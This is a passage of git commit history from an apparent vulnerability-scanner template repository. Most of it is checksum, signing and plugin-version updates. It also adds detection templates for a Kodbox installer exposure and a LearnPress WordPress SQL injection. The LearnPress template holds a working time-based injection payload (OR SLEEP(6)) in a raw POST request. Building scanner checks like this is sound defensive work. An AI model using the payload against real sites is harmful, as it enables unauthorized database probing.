http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 @@ -7893,6 +7893,7 @@ http/vulnerabilities/other/aspnuke-openredirect.yaml:0253728ab4ba638b3469701d2a7 http/vulnerabilities/other/avada-xss.yaml:09956730db06c6d4aa404e59c94ee74a60dde829 http/vulnerabilities/other/avcon6-execl-lfi.yaml:43a317b3891b8f3dd98a950eec826ee91a95b97d http/vulnerabilities/other/avcon6-lfi.yaml:31fda2c65574c91b2ccd8e140e03243fb9546bd0 +http/vulnerabilities/other/bagisto-csti.yaml:ac2efcf31d32e837adc0ae644cec73f4ed4927b7 http/vulnerabilities/other/bems-api-lfi.yaml:4b2ace615d63afc61e4401ca7c6d6bd3c7e0a02a http/vulnerabilities/other/beward-ipcamera-disclosure.yaml:4461c2309baf099cca67518def7863f003f459ac http/vulnerabilities/other/beyond-trust-xss.yaml:541a6f90d60f4267863346d5ebe9e1083f234f62 @@ -8798,7 +8799,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ee1ea4bf7b8fc5e4e03c80864a6a0bcddeafb609 +templates-checksum.txt:f03ef78d86066aa369daca64fe6f0b2799e8ab5a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 46a242d6bdf92005df3ac445e197bfd7039d3b35 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 27 Jun 2024 15:58:01 +0000 Subject: [PATCH 0693/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index af96c6fc41..f132fba0c5 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -12,6 +12,7 @@ on: - 'http/technologies/neo4j-neodash-detect.yaml' - 'http/vulnerabilities/backdoor/polyfill-backdoor.yaml' - 'http/vulnerabilities/next-js-cache-poisoning.yaml' + - 'http/vulnerabilities/other/bagisto-csti.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 4ac9c21951ec3cc1bfbd5016d767fdf37417fb4b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 15:59:00 +0000 Subject: [PATCH 0694/1841] Auto Template Signing [Thu Jun 27 15:59:00 UTC 2024] :robot: --- http/exposures/configs/neo4j-neodash-config.yaml | 1 + http/technologies/neo4j-neodash-detect.yaml | 1 + http/vulnerabilities/other/bagisto-csti.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/http/exposures/configs/neo4j-neodash-config.yaml b/http/exposures/configs/neo4j-neodash-config.yaml index 0d95152690..80a4b970ae 100644 --- a/http/exposures/configs/neo4j-neodash-config.yaml +++ b/http/exposures/configs/neo4j-neodash-config.yaml @@ -46,3 +46,4 @@ http: part: body json: - '.standaloneDatabase,.standaloneUsername,.standalonePassword' +# digest: 4a0a0047304502200d5c0975f8acab7adf6a478ec9d1e2e4fffac679464f030eebfc346df1030bf4022100888e6055414fc85406b3f2e22e6476b942f1dc16f6420f6833268a5f84848410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/neo4j-neodash-detect.yaml b/http/technologies/neo4j-neodash-detect.yaml index 7b461b5091..a0ddbb5717 100644 --- a/http/technologies/neo4j-neodash-detect.yaml +++ b/http/technologies/neo4j-neodash-detect.yaml @@ -27,3 +27,4 @@ http: - 'contains(body, "<title>NeoDash - Neo4j Dashboard Builder")' - 'status_code == 200' condition: and +# digest: 490a004630440220670983be0b787674037c4c31cbe291adaf70c919cbb2338a64a0ff33c3fb2f6e0220242df3bf304a9cda3ce49bd6e89b730b0b4baf2d0792c4f6d9acc8f29965bb71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/bagisto-csti.yaml b/http/vulnerabilities/other/bagisto-csti.yaml index 96ae031696..565f3a5035 100644 --- a/http/vulnerabilities/other/bagisto-csti.yaml +++ b/http/vulnerabilities/other/bagisto-csti.yaml @@ -32,3 +32,4 @@ http: part: content_type words: - "text/html" +# digest: 490a00463044022015e3c2098a364345bf81fc3d793a002922c4e4a93bdaf0484a0abe3157b18ece02203d187b4fa114b97d147058f5bef877743db96ec4b5ca55cfa900f793f9219ec6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 65b102612444f1abcb4511d819fb106a5d73cd04 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 27 Jun 2024 16:07:14 +0000 Subject: [PATCH 0695/1841] Auto Generated New Template Addition List [Thu Jun 27 16:07:14 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ef30f10a86..b7430e64a1 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-52251.yaml http/cves/2024/CVE-2024-34102.yaml +http/cves/2024/CVE-2024-37152.yaml http/cves/2024/CVE-2024-37881.yaml http/cves/2024/CVE-2024-6028.yaml http/exposures/configs/neo4j-neodash-config.yaml From fec2c649de227649b3271f787e8197e67ffef7ce Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 16:07:29 +0000 Subject: [PATCH 0696/1841] Auto Generated Templates Checksum [Thu Jun 27 16:07:29 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f90136b00d..b171b3c118 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3452,6 +3452,7 @@ http/cves/2024/CVE-2024-3552.yaml:0994d94f6f8b7ea5f3774e6b4fbc542a57369f6e http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 +http/cves/2024/CVE-2024-37152.yaml:02150d12db05f3fcd6cdeb2d238455022899f9d5 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c @@ -4870,7 +4871,7 @@ http/exposures/configs/magento-config-disclosure.yaml:c7ed206ff84ae43bb9bbae4ddb http/exposures/configs/mercurial-hgignore.yaml:e0ff7b4ae41b060b9ddf3ebfed79d2ccb9edef33 http/exposures/configs/msmtp-config.yaml:c2fe9549d0d0a774612ce7931ee2084a1970c22b http/exposures/configs/nagios-status-page.yaml:657a6f17b303ee8cbb7c3bf51e8fcfbda15101ef -http/exposures/configs/neo4j-neodash-config.yaml:4397687c64ba935f38f2e0e078e1cd0f334d8b1b +http/exposures/configs/neo4j-neodash-config.yaml:e06b7b59b94fc610d6511d9cb1a1b338817d5b8f http/exposures/configs/netbeans-config.yaml:30c6fc7151841e7effbf1934ecbb3c90b00a47c2 http/exposures/configs/netrc.yaml:c59cb2322fce014ee30bd8446fab2815f0de548f http/exposures/configs/nginx-config.yaml:0ed1f3adfa9b5d7b9005d62932cad2b7578f507d @@ -7076,7 +7077,7 @@ http/technologies/monstracms-detect.yaml:ceed5f23372e91f704f11a6a4db9b33340a8fb8 http/technologies/moveit-transfer-detect.yaml:2744d9bbad9ae50abef1c6523998f3b64c623268 http/technologies/mrtg-detect.yaml:1b41717cf1bb1618aa6f8a359593b98cb81f2ace http/technologies/nacos-version.yaml:46e9e392ebfe74702da3bf3f491e3487691d990e -http/technologies/neo4j-neodash-detect.yaml:c7ff92dcaacecd8008a2d2e84f0e50f50ac42add +http/technologies/neo4j-neodash-detect.yaml:dc5be3b26dd1f6879c3fc934f7315a88a17ae382 http/technologies/neos-detect.yaml:18e43d4fef8a3ce6458ddbbbfec4e6bdbdfac84e http/technologies/nethermind-server-detect.yaml:83b8aa8be46e98954ff916451eb045e8ffe9568b http/technologies/netsweeper-webadmin-detect.yaml:7975a266790de781015d82d29fe25d089ebbec50 @@ -7893,7 +7894,7 @@ http/vulnerabilities/other/aspnuke-openredirect.yaml:0253728ab4ba638b3469701d2a7 http/vulnerabilities/other/avada-xss.yaml:09956730db06c6d4aa404e59c94ee74a60dde829 http/vulnerabilities/other/avcon6-execl-lfi.yaml:43a317b3891b8f3dd98a950eec826ee91a95b97d http/vulnerabilities/other/avcon6-lfi.yaml:31fda2c65574c91b2ccd8e140e03243fb9546bd0 -http/vulnerabilities/other/bagisto-csti.yaml:ac2efcf31d32e837adc0ae644cec73f4ed4927b7 +http/vulnerabilities/other/bagisto-csti.yaml:dcc7c57c641a9a49e1e67ca561abce1574214656 http/vulnerabilities/other/bems-api-lfi.yaml:4b2ace615d63afc61e4401ca7c6d6bd3c7e0a02a http/vulnerabilities/other/beward-ipcamera-disclosure.yaml:4461c2309baf099cca67518def7863f003f459ac http/vulnerabilities/other/beyond-trust-xss.yaml:541a6f90d60f4267863346d5ebe9e1083f234f62 @@ -8799,7 +8800,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f03ef78d86066aa369daca64fe6f0b2799e8ab5a +templates-checksum.txt:fa6924da061f53625356dd25d3430d652aeb9c1e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 99f5b4b5339d93f622ade1fdf9b88c3696e394df Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 27 Jun 2024 16:08:10 +0000 Subject: [PATCH 0697/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f132fba0c5..4d5239fc12 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2023/CVE-2023-41599.yaml' - 'http/cves/2023/CVE-2023-52251.yaml' - 'http/cves/2024/CVE-2024-34102.yaml' + - 'http/cves/2024/CVE-2024-37152.yaml' - 'http/cves/2024/CVE-2024-37881.yaml' - 'http/cves/2024/CVE-2024-6028.yaml' - 'http/exposures/configs/neo4j-neodash-config.yaml' From 0ebad553e3b7079b30d38af8d273008ae792273d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 16:09:09 +0000 Subject: [PATCH 0698/1841] Auto Template Signing [Thu Jun 27 16:09:09 UTC 2024] :robot: --- http/cves/2024/CVE-2024-37152.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-37152.yaml b/http/cves/2024/CVE-2024-37152.yaml index 6d349ec802..c23c7027d3 100644 --- a/http/cves/2024/CVE-2024-37152.yaml +++ b/http/cves/2024/CVE-2024-37152.yaml @@ -38,3 +38,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100ff51e4d4de0176d7b75272c7382661952fa7f28124b1a6113d2d52675ba7d7ca022100dc729bfc997db746bf206fe0a1ae9ef36b3af92ebad27d690c90a41b636944aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 16720f70e78cf3221e263ebae5493d0428a60f9d Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Thu, 27 Jun 2024 21:22:53 +0300 Subject: [PATCH 0699/1841] add CVE-2024-4434 --- http/cves/2024/CVE-2024-4434.yaml | 55 +++++++++++++++++++++++++++++++ 1 file changed, 55 insertions(+) create mode 100644 http/cves/2024/CVE-2024-4434.yaml diff --git a/http/cves/2024/CVE-2024-4434.yaml b/http/cves/2024/CVE-2024-4434.yaml new file mode 100644 index 0000000000..e8c359dab3 --- /dev/null +++ b/http/cves/2024/CVE-2024-4434.yaml @@ -0,0 +1,55 @@ +id: CVE-2024-4434 + +info: + name: LearnPress WordPress LMS Plugin <= 4.2.6.5 - SQL Injection + author: securityforeveryone + severity: critical + description: | + The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the ‘term_id’ parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + remediation: Fixed in 4.2.6.6 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-4434 + - https://inky-knuckle-2c2.notion.site/Unauthenticated-SQLI-in-Learnpress-plugin-Version-4-2-6-5-a86fe63bcc7b4c9988802688211817fd + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-wordpress-lms-plugin-4265-unauthenticated-time-based-sql-injection + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-4434 + epss-score: 0.00063 + epss-percentile: 0.2659 + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/learnpress" + tags: cve,cve2024,wp,wp-plugin,wordpress,sqli,learnpress +variables: + num: "{{rand_int(10000, 99999)}}" + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout 30sn + POST /wp-json/lp/v1/courses/archive-course?term_id={{num}})+OR+SLEEP(6)+--+A HTTP/1.1 + Host: {{Hostname}} + X-WP-Nonce: {{nonce}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration_2 >= 6' + - 'contains(body_2,"status":"success")' + - 'status_code_2 == 200' + + extractors: + - type: regex + name: nonce + part: body + group: 1 + regex: + - '"nonce":"([a-z0-9]+)","is_course_archive"' + internal: true From efe1c7988fbf6769cf4039abcd647592fa42cd05 Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Thu, 27 Jun 2024 21:28:38 +0300 Subject: [PATCH 0700/1841] fix --- http/cves/2024/CVE-2024-4434.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-4434.yaml b/http/cves/2024/CVE-2024-4434.yaml index e8c359dab3..f6ea9254fb 100644 --- a/http/cves/2024/CVE-2024-4434.yaml +++ b/http/cves/2024/CVE-2024-4434.yaml @@ -41,9 +41,9 @@ http: matchers: - type: dsl dsl: - - 'duration_2 >= 6' - - 'contains(body_2,"status":"success")' - - 'status_code_2 == 200' + - 'duration_2 >= 6' + - 'contains(body_2,"status":"success")' + - 'status_code_2 == 200' extractors: - type: regex From 39c15c523ab802aa0367d16a438bdaba0fe456d3 Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Thu, 27 Jun 2024 23:07:55 +0300 Subject: [PATCH 0701/1841] update matcher --- http/cves/2024/CVE-2024-4434.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4434.yaml b/http/cves/2024/CVE-2024-4434.yaml index f6ea9254fb..09c62cdc19 100644 --- a/http/cves/2024/CVE-2024-4434.yaml +++ b/http/cves/2024/CVE-2024-4434.yaml @@ -37,13 +37,14 @@ http: Host: {{Hostname}} X-WP-Nonce: {{nonce}} - matchers-condition: and + matchers: - type: dsl dsl: - 'duration_2 >= 6' - 'contains(body_2,"status":"success")' - 'status_code_2 == 200' + condition: and extractors: - type: regex From 1eccff787dc1394dfaf691e87157e02933a2bd40 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 28 Jun 2024 01:49:21 +0530 Subject: [PATCH 0702/1841] Create kodbox-installer.yaml --- .../installer/kodbox-installer.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/misconfiguration/installer/kodbox-installer.yaml diff --git a/http/misconfiguration/installer/kodbox-installer.yaml b/http/misconfiguration/installer/kodbox-installer.yaml new file mode 100644 index 0000000000..f764988849 --- /dev/null +++ b/http/misconfiguration/installer/kodbox-installer.yaml @@ -0,0 +1,34 @@ +id: kodbox-installer + +info: + name: Kodbox Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Kodbox is susceptible to the Installation page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + fofa-query: title="kodbox" && body="install" + tags: misconfig,exposure,install,kodbox + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Kodbox-Installation" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From b121dd49e536829ecc56836d2445e9e59a1cf6fa Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 28 Jun 2024 00:19:25 +0000 Subject: [PATCH 0703/1841] Auto WordPress Plugins Update [Fri Jun 28 00:19:25 UTC 2024] :robot: --- helpers/wordpress/plugins/advanced-custom-fields.txt | 2 +- helpers/wordpress/plugins/backwpup.txt | 2 +- helpers/wordpress/plugins/custom-post-type-ui.txt | 2 +- helpers/wordpress/plugins/duplicator.txt | 2 +- helpers/wordpress/plugins/happy-elementor-addons.txt | 2 +- helpers/wordpress/plugins/kadence-blocks.txt | 2 +- helpers/wordpress/plugins/loginizer.txt | 2 +- helpers/wordpress/plugins/newsletter.txt | 2 +- helpers/wordpress/plugins/post-smtp.txt | 2 +- helpers/wordpress/plugins/royal-elementor-addons.txt | 2 +- helpers/wordpress/plugins/safe-svg.txt | 2 +- helpers/wordpress/plugins/the-events-calendar.txt | 2 +- helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt | 2 +- helpers/wordpress/plugins/wp-super-cache.txt | 2 +- helpers/wordpress/plugins/wpforms-lite.txt | 2 +- helpers/wordpress/plugins/wps-hide-login.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 3 +-- http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - 